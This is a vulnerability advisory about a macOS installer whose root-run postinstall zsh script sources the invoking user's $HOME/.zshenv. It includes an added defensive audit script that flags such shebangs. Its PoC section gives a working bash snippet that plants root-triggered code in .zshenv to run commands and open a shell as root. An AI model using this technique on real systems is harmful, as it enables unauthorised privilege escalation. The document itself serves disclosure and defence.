Summary
It's possible to abuse a vulnerability inside the postinstall installer script to make the installer execute arbitrary code as root.
Details
The cause of the vulnerability is the fact that the shebang #!/bin/zsh is being used. When the installer is executed it asks for the user's password so that it can run as root. However, it still uses the $HOME of the invoking user and therefore sources the file $HOME/.zshenv when the postinstall script is executed.
An attacker could add malicious code to $HOME/.zshenv and it will be executed when the app is installed.
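The following audit script is an added example (not part of the advisory) that flags installer scripts using the pattern described above: a zsh shebang without -f/--no-rcs, which makes a root-run script source the invoking user's $HOME/.zshenv. The sample files it writes into a temporary directory are constructed stand-ins for a package's Scripts directory.

```shell
#!/bin/sh
# zsh sources $ZDOTDIR/.zshenv (default $HOME/.zshenv) even for non-interactive
# scripts; "zsh -f" (NO_RCS) skips every startup file except root-owned
# /etc/zshenv, and /bin/sh reads none. Added example, not the advisory's code.

# check_shebang FILE: print a verdict; return 0 if ok, 1 if flagged.
check_shebang() {
  first=$(head -n 1 "$1")
  case "$first" in
    '#!'*) ;;
    *) echo "ok: $1 (no shebang)"; return 0 ;;
  esac
  # Drop "#!" and an optional /usr/bin/env indirection, then tokenize.
  set -- "$1" $(printf '%s\n' "${first#??}" | sed 's#^[[:space:]]*/usr/bin/env[[:space:]]*##')
  file=$1; interp=$2; shift 2
  case "$interp" in
    *zsh) ;;
    *) echo "ok: $file ($interp is not zsh)"; return 0 ;;
  esac
  for tok in "$@"; do
    case "$tok" in
      --no-rcs|-f*|-[!-]*f*) echo "ok: $file (zsh started with $tok)"; return 0 ;;
    esac
  done
  echo "FLAG: $file: '$first' sources \$HOME/.zshenv when run as root"
  return 1
}

# audit_dir DIR: check every regular file in DIR; return 1 if any is flagged.
audit_dir() {
  flagged=0
  for f in "$1"/*; do
    [ -f "$f" ] || continue
    check_shebang "$f" || flagged=$((flagged + 1))
  done
  echo "$flagged script(s) flagged in $1"
  [ "$flagged" -eq 0 ]
}

# Constructed samples: one vulnerable postinstall, its fixed form, a sh script.
demo_dir=$(mktemp -d)
printf '#!/bin/zsh\necho "installing"\n' > "$demo_dir/postinstall"
printf '#!/bin/zsh -f\necho "installing"\n' > "$demo_dir/postinstall.fixed"
printf '#!/bin/sh\necho "checking"\n' > "$demo_dir/preinstall"
audit_dir "$demo_dir" || true
rm -r "$demo_dir"
```

On macOS the scripts to audit come from `pkgutil --expand <pkg> <dir>` (the Scripts payload); the check only looks at the shebang, so a zsh script that reads other user-controlled files still needs manual review.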
PoC
The following script will add some "malicious" code to $HOME/.zshenv:

    #!/bin/bash
    # Prepare the execution of the payload
    cp "$HOME/.zshenv" "$HOME/.zshenv.old"
    cat > "$HOME/.zshenv" << EOF
    if [[ \$EUID -eq 0 ]]; then
        whoami > /tmp/whoami
        /Applications/iTerm.app/Contents/MacOS/iTerm2 &
    fi
    EOF
Then just execute the installer and you should find the file /tmp/whoami with the content root and an iTerm shell executed as root.
Impact
Privilege escalation to root.